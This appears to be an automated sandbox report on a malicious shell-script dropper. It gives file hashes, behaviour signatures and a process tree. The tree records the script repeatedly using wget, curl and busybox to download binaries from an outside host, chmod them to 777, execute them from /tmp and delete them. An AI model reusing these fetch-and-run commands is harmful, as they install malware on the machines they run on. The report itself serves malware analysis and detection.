Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
24/11/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
-
Size
10KB
-
MD5
212b02f29854addd09c83c096b0a28d8
-
SHA1
6d3e25cbd8a8331cfec87e951c697876d1ce21c5
-
SHA256
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788
-
SHA512
8ae72b9af1d4e17bda84c690db9c365158e62d7dcf4dae5a7f42a9edf5f1faae4b8955062fcadd5a6f40c68045060f91734e883bd234aa98d078149be0382a85
-
SSDEEP
192:bZR+7fUY+OQy21N8fzFNEZR+7f2Y8D1N8fz8:7OQyPNAV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 21 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 63 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:708
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:733
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:734
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:779
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:785
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:787
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:804
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:809
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:810
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:816
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:820
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:860
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:882
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:885
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:892
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:952
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97